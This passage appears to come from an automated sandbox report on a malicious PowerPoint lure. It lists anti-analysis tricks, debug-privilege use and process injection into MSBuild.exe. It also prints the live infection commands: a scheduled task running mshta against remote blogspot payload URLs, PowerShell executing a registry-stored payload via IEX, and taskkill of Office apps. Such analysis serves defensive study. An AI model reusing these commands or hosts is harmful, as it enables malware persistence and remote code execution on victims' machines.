Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\PING.EXE	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\PING.EXE	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 1949
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 7788

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\mshta.exe TID: 2732	Thread sleep time: -480000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 852	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2252	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 2400	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 1916	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 2112	Thread sleep time: -420000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 2376	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 1532	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 1532	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3048	Thread sleep time: -360000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2284	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 3068	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 3068	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2372	Thread sleep time: -420000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1144	Thread sleep time: -420000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2092	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2092	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2340	Thread sleep count: 1949 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2340	Thread sleep count: 7788 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2092	Thread sleep count: 94 > 30
Source: C:\Windows\System32\mshta.exe TID: 2440	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 1988	Thread sleep time: -480000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2804	Thread sleep time: -360000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1068	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 1900	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 3036	Thread sleep time: -540000s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 2560	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 2744	Thread sleep time: -300000s >= -30000s

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\System32\PING.EXE	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 12_2_01D8096A GetSystemInfo,

12_2_01D8096A

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: mshta.exe, 00000011.00000002.2222610577.00000000005BA000.00000004.00000001.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\System32\mshta.exe

Memory protected: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Creates a scheduled task launching mshta.exe (likely to bypass HIPS)

Source: unknown	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: unknown base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: unknown base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 438000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43A000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FFFDE008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)\|IEX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://randikhanaekminar.blogspot.com/p/st2.html'', 0 : window.close')	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://randikhanaekminar.blogspot.com/p/st2.html	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)\|IEX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EXCEL.exe
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).meather)\|IEX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://backbones1234511a.blogspot.com/p/stback1.html
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)\|IEX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://startthepartyup.blogspot.com/p/backbone14.html
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ghostbackbone123.blogspot.com/p/ghostbackup13.html

Uses taskkill to terminate processes

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EXCEL.exe

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
